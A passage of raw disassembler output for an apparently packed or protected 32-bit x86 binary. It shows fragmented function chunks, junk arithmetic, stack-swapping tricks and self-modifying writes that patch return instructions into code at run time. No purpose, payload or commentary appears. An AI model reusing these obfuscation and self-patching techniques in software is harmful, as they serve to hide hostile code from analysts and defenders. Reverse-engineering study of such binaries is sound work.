jmp loc_4588F1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44602A
loc_43AE03: ; CODE XREF: sub_44602A+9943j
jmp loc_447377
; END OF FUNCTION CHUNK FOR sub_44602A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B01F
loc_43AE08: ; CODE XREF: sub_44B01F-1176Bj
jmp loc_44EC9D
; END OF FUNCTION CHUNK FOR sub_44B01F
; ---------------------------------------------------------------------------
cdq
js loc_459E8F
popf
jmp loc_452016
; =============== S U B R O U T I N E =======================================
sub_43AE1A proc near ; CODE XREF: sub_439B67+A7FDp
; ut7h7i2x:0044B34Cj
arg_8 = dword ptr 0Ch
; FUNCTION CHUNK AT 0043A174 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043BEFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BFAE SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004401AD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004423A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044263D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00445F12 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044F015 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00450C1D SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00452D07 SIZE 00000018 BYTES
xchg edx, [esp+0]
pop edx
cmp al, 0A4h
jz loc_4484C7
loc_43AE26: ; CODE XREF: ut7h7i2x:00455961j
jmp loc_43BEFE
sub_43AE1A endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_440. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4396F5
loc_43AE2C: ; CODE XREF: sub_4396F5+16F3Bj
jmp loc_43A629
; END OF FUNCTION CHUNK FOR sub_4396F5
; =============== S U B R O U T I N E =======================================
sub_43AE31 proc near ; CODE XREF: sub_4415EB+11DABp
; ut7h7i2x:00456FE3j
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00454BE1 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
popf
xchg ebx, [esp-8+arg_4]
jmp loc_454BE1
sub_43AE31 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_43AE3E: ; CODE XREF: ut7h7i2x:00439B4Bj
sub edx, 51E9C9E2h
add edx, 6EB2A3BCh
xchg edx, [esp]
jmp loc_44553B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43AE52: ; CODE XREF: sub_43DBEC-660j
jnz loc_443899
jmp loc_449C6A
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_43AE5D: ; CODE XREF: sub_44DEFF-2C7Aj
pop ebx
sub ebx, 7C6327C7h
and ebx, 25E3179Eh
add ebx, 0DF61C174h
mov [ebx], eax
pop ebx
lea eax, loc_44A9B6
mov byte ptr [eax], 0C3h
jmp loc_452206
; END OF FUNCTION CHUNK FOR sub_44DEFF
; ---------------------------------------------------------------------------
loc_43AE81: ; CODE XREF: ut7h7i2x:004596AAj
mov eax, 52h
call sub_43A1DB
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43AE8B: ; CODE XREF: sub_457A66-12D12j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440AE3
loc_43AE8D: ; CODE XREF: sub_440AE3+150AEj
jmp sub_446151
; END OF FUNCTION CHUNK FOR sub_440AE3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4544E6
loc_43AE92: ; CODE XREF: sub_4544E6-144E2j
jmp loc_43FDF9
; END OF FUNCTION CHUNK FOR sub_4544E6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44715B
loc_43AE97: ; CODE XREF: sub_44715B-AF04j
jmp nullsub_63
; END OF FUNCTION CHUNK FOR sub_44715B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43AE9C: ; CODE XREF: sub_457A66-153B6j
rol eax, 10h
push eax
push ebp
mov ebp, edi
jmp loc_43B2E5
; END OF FUNCTION CHUNK FOR sub_457A66
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_460. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6EB
loc_43AEA9: ; CODE XREF: sub_43E6EB+10j
jmp loc_45609A
; END OF FUNCTION CHUNK FOR sub_43E6EB
; ---------------------------------------------------------------------------
dw 2E17h
dword_43AEB0 dd 0 ; DATA XREF: sub_45854D:loc_455F4Cr
; sub_45854D:loc_45A2D8r
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D989
loc_43AEB4: ; CODE XREF: sub_43D989+1CDA6j
jmp nullsub_455
; END OF FUNCTION CHUNK FOR sub_43D989
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456F1D
loc_43AEB9: ; CODE XREF: sub_456F1D-BD5Dj
jmp loc_443F55
; END OF FUNCTION CHUNK FOR sub_456F1D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44865D
loc_43AEBE: ; CODE XREF: sub_44865D-8C6Aj
jmp loc_43B7DD
; END OF FUNCTION CHUNK FOR sub_44865D
; ---------------------------------------------------------------------------
db 0D9h
dd 0A45435AAh, 642E64CCh ; DATA XREF: sub_45854D-1CB72o
; sub_45854D-8827o
db 6Ch, 36h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450231
loc_43AECF: ; CODE XREF: sub_450231+2D35j
jmp loc_4542CC
; END OF FUNCTION CHUNK FOR sub_450231
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439FD5
loc_43AED4: ; CODE XREF: sub_439FD5+12j
jmp loc_455027
; END OF FUNCTION CHUNK FOR sub_439FD5
; =============== S U B R O U T I N E =======================================
sub_43AED9 proc near ; CODE XREF: ut7h7i2x:00439BB4j
; ut7h7i2x:0043A1A1p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004396B9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043AFF3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B5FA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D631 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F131 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043F8F5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00443F9E SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004457E0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00446BA0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447F82 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00448A8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044A730 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BEEA SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0044F331 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454C9B SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004573E2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458D30 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00458FD5 SIZE 00000002 BYTES
jz loc_44BEEA
mov edx, ds:dword_443FA8
or edx, edx
jnz loc_443F9E
jmp loc_4396B9
sub_43AED9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_43AEF2: ; CODE XREF: sub_453E14-53B9j
cmp edi, esi
jmp loc_450885
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
adc ebp, 4F07ACEAh
sbb eax, edx
jmp sub_445AD1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44AA33
loc_43AF06: ; CODE XREF: sub_44AA33:loc_44D98Ej
add edx, 0F346FC73h
xchg edx, [esp+0]
jmp loc_454B3E
; END OF FUNCTION CHUNK FOR sub_44AA33
; ---------------------------------------------------------------------------
sub esi, 63857C2Bh
and ebx, 0DF692E6h
jmp sub_44EC6F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_43AF25: ; CODE XREF: sub_459DE7-17E65j
xchg ecx, [esp+0]
jmp loc_447591
; END OF FUNCTION CHUNK FOR sub_459DE7
; =============== S U B R O U T I N E =======================================
sub_43AF2D proc near ; CODE XREF: ut7h7i2x:00449F47j
; ut7h7i2x:loc_44C41Ap
xchg ebx, [esp+0]
pop ebx
pop ecx
shl eax, 3
mov edx, [ebp+8]
or [edx-8], eax
sub_43AF2D endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43AF3B: ; CODE XREF: ut7h7i2x:0044EDFDj
; sub_442B3B+C2CBj ...
jz loc_45426B
cmp dword ptr [ebp-14h], 4
jmp loc_4450F1
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
loc_43AF4A: ; CODE XREF: ut7h7i2x:004397AAj
jnz loc_43FA30
jmp loc_459BCE
; ---------------------------------------------------------------------------
rol edx, 0Ah
popf
jmp sub_4551FB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449553
loc_43AF5E: ; CODE XREF: sub_449553+Cj
xchg edi, [esp+0]
mov edx, edi
pop edi
locret_43AF64: ; CODE XREF: sub_450DA8+6j
retn
; END OF FUNCTION CHUNK FOR sub_449553
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446320
loc_43AF65: ; CODE XREF: sub_446320+D06j
jmp loc_45891F
; END OF FUNCTION CHUNK FOR sub_446320
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44937E
loc_43AF6A: ; CODE XREF: sub_450DB3-12977j
; sub_44937E+7EDj
rol eax, 11h
jmp loc_43D982
; END OF FUNCTION CHUNK FOR sub_44937E
; =============== S U B R O U T I N E =======================================
sub_43AF72 proc near ; CODE XREF: ut7h7i2x:0043FEA6j
; sub_4448AF+B1C3p
; FUNCTION CHUNK AT 0044FDFF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453DDB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00454086 SIZE 0000000A BYTES
xchg eax, [esp+0]
pop eax
add ecx, 9F508E44h
popf
xor eax, ecx
pop ecx
sub eax, 2B4F102Eh
push esi
jmp loc_44FDFF
sub_43AF72 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
dword_43AF8C dd 2FEBBF3Dh ; DATA XREF: sub_44A3D0:loc_454E20r
dword_43AF90 dd 0 ; DATA XREF: sub_44B5CF:loc_445A79r
; ut7h7i2x:004587D6w
; ---------------------------------------------------------------------------
jmp loc_44A240
; ---------------------------------------------------------------------------
db 0FDh, 32h, 0E9h
dword_43AF9C dd 77D40000h ; DATA XREF: ut7h7i2x:0043C9E3r
; sub_44C87F:loc_43E5C6r ...
; ---------------------------------------------------------------------------
loc_43AFA0: ; CODE XREF: ut7h7i2x:0044E35Cj
jmp loc_456229
; ---------------------------------------------------------------------------
db 79h, 99h, 5Dh
dword_43AFA8 dd 0C995CDAEh, 32E22333h ; DATA XREF: sub_44E84C+4o
db 36h, 6Ch, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_43AFB3: ; CODE XREF: sub_43AB62+11989j
jmp loc_43CD5F
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
dword_43AFB8 dd 0D0h ; DATA XREF: sub_44FDF2+5631r
; ut7h7i2x:00455838w
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450645
loc_43AFBC: ; CODE XREF: sub_450645-14E83j
jmp loc_446036
; END OF FUNCTION CHUNK FOR sub_450645
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F43B
loc_43AFC1: ; CODE XREF: sub_44F43B+86D2j
jz loc_44BCA5
loc_43AFC7: ; CODE XREF: sub_455B51-4C3j
jmp nullsub_309
; END OF FUNCTION CHUNK FOR sub_44F43B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_43AFCC: ; CODE XREF: sub_43E592+149BBj
jmp loc_4499AE
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454B2B
loc_43AFD1: ; CODE XREF: sub_454B2B-48C6j
jmp nullsub_449
; END OF FUNCTION CHUNK FOR sub_454B2B
; ---------------------------------------------------------------------------
loc_43AFD6: ; CODE XREF: ut7h7i2x:00443047j
jmp loc_44D6AF
; ---------------------------------------------------------------------------
or esi, edx
jns loc_450EAF
adc ecx, edx
or esi, ecx
jmp loc_44BCA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4460A2
loc_43AFEC: ; CODE XREF: sub_4460A2:loc_442CF7j
mov eax, [eax]
call sub_445E13
; END OF FUNCTION CHUNK FOR sub_4460A2
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_43AFF3: ; CODE XREF: sub_43AED9+A919j
jmp loc_454C9B
; END OF FUNCTION CHUNK FOR sub_43AED9
; ---------------------------------------------------------------------------
loc_43AFF8: ; CODE XREF: ut7h7i2x:0043B0A3j
jmp loc_4574FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_43AFFD: ; CODE XREF: sub_455807:loc_45A13Ej
popf
cmp edi, ebp
jmp loc_453DED
; END OF FUNCTION CHUNK FOR sub_455807
; =============== S U B R O U T I N E =======================================
sub_43B005 proc near ; DATA XREF: sub_44D77D-3211o
xor edx, 4373895Ch
popf
push offset sub_457576
jmp loc_441066
sub_43B005 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E6CC
loc_43B016: ; CODE XREF: sub_43E6CC-47ADj
pop esi
add ebp, esi
jl loc_43C893
loc_43B01F: ; CODE XREF: sub_43E6CC:loc_4521D0j
mov eax, 1F56AC7Bh
push edi
push 342782A9h
pop edi
jmp loc_4519AF
; END OF FUNCTION CHUNK FOR sub_43E6CC
; ---------------------------------------------------------------------------
loc_43B030: ; CODE XREF: ut7h7i2x:0044A154j
jz loc_443576
test edi, 8D29A061h
jmp loc_455902
; ---------------------------------------------------------------------------
loc_43B041: ; DATA XREF: ut7h7i2x:0043BF20o
and al, 7
push offset sub_43E944
jmp locret_43BDB2
; ---------------------------------------------------------------------------
loc_43B04D: ; CODE XREF: ut7h7i2x:00453988j
jnz loc_441134
; START OF FUNCTION CHUNK FOR sub_440B68
loc_43B053: ; CODE XREF: sub_440B68:loc_456F65j
xor edx, 0D89D190Bh
call sub_44D848
; END OF FUNCTION CHUNK FOR sub_440B68
; START OF FUNCTION CHUNK FOR sub_44B909
loc_43B05E: ; CODE XREF: sub_44B909+11j
jmp nullsub_124
; END OF FUNCTION CHUNK FOR sub_44B909
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_43B063: ; CODE XREF: sub_43DBEC+7668j
jmp loc_459554
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43B068: ; CODE XREF: sub_439BF8+184CEj
cmp edi, 0C5FB60F3h
jmp loc_4426F2
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_456177
loc_43B073: ; CODE XREF: sub_456177:loc_43A7D4j
mov eax, edi
xchg eax, [esp+0Ch+var_C]
push eax
mov eax, ebx
call sub_445A8C
loc_43B080: ; CODE XREF: sub_4398BF+285Ej
jmp loc_44826C
; END OF FUNCTION CHUNK FOR sub_456177
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453D8B
loc_43B085: ; CODE XREF: ut7h7i2x:loc_43B62Bj
; sub_453D8B-13F4Fj
xor eax, 0A98B21DAh
rol eax, 1Ch
loc_43B08E: ; CODE XREF: ut7h7i2x:loc_455FD2j
call sub_452BE9
loc_43B093: ; CODE XREF: sub_448CDC+1076Dj
jmp loc_44F27F
; END OF FUNCTION CHUNK FOR sub_453D8B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F256
loc_43B098: ; CODE XREF: sub_44F256-77A5j
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_44F256
; ---------------------------------------------------------------------------
loc_43B09D: ; CODE XREF: ut7h7i2x:0045350Dj
jnz loc_443CBC
jmp loc_43AFF8
; =============== S U B R O U T I N E =======================================
sub_43B0A8 proc near ; CODE XREF: sub_451EF2j
; FUNCTION CHUNK AT 00458C71 SIZE 00000005 BYTES
push ebp
push offset loc_459BD3
jmp loc_458C71
sub_43B0A8 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455807
loc_43B0B3: ; CODE XREF: sub_455807-1BBECj
; sub_455807:loc_445B54j
mov eax, [ebp+var_4]
cmp byte ptr [eax], 0F1h
jnz loc_453DF8
jmp loc_439C58
; END OF FUNCTION CHUNK FOR sub_455807
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CEB
loc_43B0C4: ; CODE XREF: sub_447CEB:loc_446881j
push offset loc_44B2C5
jmp loc_452C26
; END OF FUNCTION CHUNK FOR sub_447CEB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_43B0CE: ; CODE XREF: sub_450FDE:loc_44CF9Cj
pop esi
loc_43B0CF: ; CODE XREF: sub_45A8EC-FC34j
; sub_44FB67+8j
xor eax, 0C70A8F0Ch
jns loc_450C6D
ror eax, 9
xor eax, 0B7823F98h
ror eax, 8
jmp loc_44401E
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_451A5A
loc_43B0EC: ; CODE XREF: sub_451A5A:loc_4501FEj
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
mov eax, edx
call sub_455807
mov eax, [esp+4+var_4]
call sub_454196
jmp loc_43A7B6
; END OF FUNCTION CHUNK FOR sub_451A5A
; =============== S U B R O U T I N E =======================================
sub_43B106 proc near ; DATA XREF: sub_451F89+9o
; FUNCTION CHUNK AT 0045A655 SIZE 00000023 BYTES
mov edx, 0B9726E5Ah
call sub_441F10
loc_43B110: ; CODE XREF: sub_457B87+Dj
jmp loc_45A655
sub_43B106 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A12
loc_43B115: ; CODE XREF: sub_444A12+7700j
jz loc_43EDC1
jmp loc_4478FD
; END OF FUNCTION CHUNK FOR sub_444A12
; =============== S U B R O U T I N E =======================================
sub_43B120 proc near ; DATA XREF: ut7h7i2x:0043F5EBo
; FUNCTION CHUNK AT 00452FC2 SIZE 00000005 BYTES
xchg edi, [esp+0]
jmp loc_452FC2
sub_43B120 endp
; ---------------------------------------------------------------------------
jg loc_4423C8
rol edx, 0Fh
jmp sub_4587E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B58
loc_43B136: ; CODE XREF: sub_439B58+Aj
pop eax
xor eax, 0DFB49F9Ch
cmp eax, 0BE4D419Eh
jmp loc_43BE01
; END OF FUNCTION CHUNK FOR sub_439B58
; ---------------------------------------------------------------------------
loc_43B148: ; DATA XREF: sub_43D643+6o
mov eax, [eax+24h]
push ecx
push 1B4A85D3h
pop ecx
rol ecx, 17h
add ecx, 6518032Eh
jmp loc_44BF97
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44941C
loc_43B160: ; CODE XREF: sub_44941C+EEF8j
shl edi, 0Dh
mov ebp, [ecx]
loc_43B165: ; CODE XREF: sub_44941C:loc_439507j
call sub_4587DD
mov edx, 9E99B23Eh
push eax
push 8F73A106h
pop eax
add eax, 0AE80BF32h
jmp loc_4510DE
; END OF FUNCTION CHUNK FOR sub_44941C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4489DF
loc_43B181: ; CODE XREF: sub_4489DF:loc_44EBC6j
push 0EF37D1F2h
pop esi
or esi, 5C5F6F2Dh
call sub_450606
loc_43B192: ; CODE XREF: sub_44C117+3j
jmp loc_44C12F
; END OF FUNCTION CHUNK FOR sub_4489DF
; ---------------------------------------------------------------------------
loc_43B197: ; CODE XREF: ut7h7i2x:0043F8A6j
jmp loc_44495C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2E0
loc_43B19C: ; CODE XREF: sub_44E2E0-11A00j
jmp loc_45250F
; END OF FUNCTION CHUNK FOR sub_44E2E0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_43B1A1: ; CODE XREF: sub_43AA94+12CAj
jmp nullsub_102
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_43B1A6: ; CODE XREF: sub_43B7F7+12D1Ej
cmp ecx, eax
jmp loc_44DEE7
; END OF FUNCTION CHUNK FOR sub_43B7F7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455E0B
loc_43B1AD: ; CODE XREF: sub_455E0B-1CD32j
sub eax, edx
push 0D573EB15h
loc_43B1B4: ; CODE XREF: sub_44E2C4:loc_4566E5j
push 0
push esi
jmp loc_44851C
; END OF FUNCTION CHUNK FOR sub_455E0B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_43B1BC: ; CODE XREF: sub_4518D7:loc_4582B9j
mov ecx, ebx
call sub_4594DA
loc_43B1C3: ; CODE XREF: sub_452C66-1363Fj
jmp sub_43AED9
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444A08
loc_43B1C8: ; CODE XREF: sub_444A08:loc_453E0Fj
jl loc_441534
not ebx
jmp loc_441530
; END OF FUNCTION CHUNK FOR sub_444A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45215F
loc_43B1D5: ; CODE XREF: sub_45215F:loc_448D7Dj
mov ds:dword_43A7A8, eax
xor eax, eax
mov ds:dword_43A79C, eax
jmp loc_441291
; END OF FUNCTION CHUNK FOR sub_45215F
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43B1E6 proc near ; CODE XREF: sub_43BA59j
; FUNCTION CHUNK AT 0044F708 SIZE 0000000A BYTES
push ebp
mov ebp, esp
push ecx
call sub_43DD17
loc_43B1EF: ; CODE XREF: ut7h7i2x:0045491Aj
jmp loc_44F708
sub_43B1E6 endp
; ---------------------------------------------------------------------------
loc_43B1F4: ; CODE XREF: ut7h7i2x:00455CF4j
and esi, edi
or esi, 0D8A807A1h
adc edx, 0DEF6570h
jmp loc_43A2B1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B789
loc_43B207: ; CODE XREF: sub_44B789:loc_4422AFj
popf
add ecx, edx
jmp loc_45649C
; END OF FUNCTION CHUNK FOR sub_44B789
; ---------------------------------------------------------------------------
loc_43B20F: ; CODE XREF: ut7h7i2x:0043D270j
jnz loc_44C64D
mov edx, ecx
jmp sub_439A43
; ---------------------------------------------------------------------------
popf
jmp loc_4475A6
; ---------------------------------------------------------------------------
loc_43B222: ; DATA XREF: ut7h7i2x:0045A6B5o
sub al, 99h
call sub_43DAC5
; START OF FUNCTION CHUNK FOR sub_4398BF
loc_43B229: ; CODE XREF: sub_4398BF+F9C9j
jmp loc_43C11C
; END OF FUNCTION CHUNK FOR sub_4398BF
; ---------------------------------------------------------------------------
loc_43B22E: ; CODE XREF: ut7h7i2x:00451E9Fj
jnb loc_43EBDF
; =============== S U B R O U T I N E =======================================
sub_43B234 proc near ; CODE XREF: sub_45108E+571Bp
; FUNCTION CHUNK AT 00439D45 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043F422 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
call sub_450EFA
mov eax, 729645CDh
push edi
jmp loc_439D45
sub_43B234 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A513
loc_43B248: ; CODE XREF: sub_43A513+7A51j
; sub_43DD17:loc_457146j
push 0FCEBDEB5h
loc_43B24D: ; CODE XREF: sub_43A513:loc_441097j
mov eax, [esp+0]
push eax
call sub_43CA2D
or eax, eax
jnz loc_450E77
jmp loc_4588E6
; END OF FUNCTION CHUNK FOR sub_43A513
; ---------------------------------------------------------------------------
db 0Fh
; ---------------------------------------------------------------------------
mov ch, [edi]
and al, [ecx]
add [edi+241C87DDh], al ; CODE XREF: sub_44045E+6p
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_43B271: ; CODE XREF: ut7h7i2x:0044F62Cj
mov eax, [ebp+8]
jmp loc_4593A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446258
loc_43B279: ; CODE XREF: sub_446258+1211Ej
mov [ecx], ebx
not ebp
jmp loc_44FE53
; END OF FUNCTION CHUNK FOR sub_446258
; ---------------------------------------------------------------------------
loc_43B282: ; CODE XREF: ut7h7i2x:00446D5Dj
call sub_43AA94
push esi
mov esi, edi
xchg esi, [esp]
push 0C066AA01h
pop edi
and edi, 0F409C2D5h
or edi, 0C587543Eh
jmp loc_4462C3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449FB0
loc_43B2A4: ; CODE XREF: sub_449FB0+CF89j
jl loc_43C0B3
; END OF FUNCTION CHUNK FOR sub_449FB0
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43B2AA: ; CODE XREF: sub_442B3B:loc_43D254j
jnp loc_4500F2
jmp loc_43C0F1
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
mov eax, 64A3F24h
push ebx
push 54BE3B11h
pop ebx
or ebx, 83DD7E7Ch
jmp loc_44758C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448215
loc_43B2CC: ; CODE XREF: sub_448215:loc_44DE54j
add eax, 0A29B5279h
xchg eax, [esp+0]
jmp loc_4418E2
; END OF FUNCTION CHUNK FOR sub_448215
; ---------------------------------------------------------------------------
loc_43B2DA: ; CODE XREF: ut7h7i2x:00449F90j
jnz loc_4409B6
jmp loc_43B41A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_43B2E5: ; CODE XREF: sub_457A66-1CBC3j
xchg ebp, [esp+0]
push 8042C66Dh
xchg ecx, [esp+4+var_4]
mov edi, ecx
pop ecx
rol edi, 10h
or edi, 0AA67D72Ah
jmp loc_454F91
; END OF FUNCTION CHUNK FOR sub_457A66
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_43B301: ; CODE XREF: sub_439BF8:loc_456868j
jnz loc_439408
jmp loc_4472B3
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4558CC
loc_43B30C: ; CODE XREF: sub_4558CC:loc_453889j
push 71F7310Bh
pop esi
and esi, 203095BCh
xor esi, 0F964F2F4h
and esi, 0CD50C4D5h
add esi, 36F3DA42h
jmp loc_458EF9
; END OF FUNCTION CHUNK FOR sub_4558CC
; =============== S U B R O U T I N E =======================================
sub_43B32F proc near ; DATA XREF: ut7h7i2x:0044FFFDo
mov byte ptr [eax], 0C3h
jmp nullsub_442
sub_43B32F endp
; ---------------------------------------------------------------------------
push ecx
push 9D1D2BABh
pop ecx
and ecx, 55EC0E64h
xor ecx, 0AF982A07h
jmp loc_456EFD
; =============== S U B R O U T I N E =======================================
sub_43B34F proc near ; CODE XREF: ut7h7i2x:004493C6j
; sub_447DDB+8007p
xchg ecx, [esp+0]
pop ecx
push edx
push eax
call sub_459653
loc_43B35A: ; CODE XREF: ut7h7i2x:0043ED54j
jmp loc_43EE00
sub_43B34F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_442B3B
loc_43B35F: ; CODE XREF: sub_442B3B+C120j
xchg esi, [esp+0]
jmp sub_442872
; END OF FUNCTION CHUNK FOR sub_442B3B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445048
loc_43B367: ; CODE XREF: sub_445048+98CFj
js loc_44F045
mov ecx, ebx
loc_43B36F: ; CODE XREF: sub_445048:loc_44E905j
or ebx, 0DECF35C6h
xor ebx, 99966F14h
add ebx, 99FB1DA5h
jmp loc_44A890
; END OF FUNCTION CHUNK FOR sub_445048
; ---------------------------------------------------------------------------
loc_43B386: ; CODE XREF: ut7h7i2x:004457C7j
and esi, ebp
rol ebp, 1Eh
and ebx, eax
; START OF FUNCTION CHUNK FOR sub_448CED
loc_43B38D: ; CODE XREF: sub_448CED:loc_4457B5j
add edi, 838FB42Bh
mov [edi], edx
jmp loc_444E25
; END OF FUNCTION CHUNK FOR sub_448CED
; ---------------------------------------------------------------------------
sbb edi, ebx
jmp sub_44271B
; ---------------------------------------------------------------------------
loc_43B3A1: ; CODE XREF: ut7h7i2x:004392CDj
call sub_44F000
; START OF FUNCTION CHUNK FOR sub_452FE5
loc_43B3A6: ; CODE XREF: sub_452FE5+Dj
jmp nullsub_408
; END OF FUNCTION CHUNK FOR sub_452FE5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444AA3
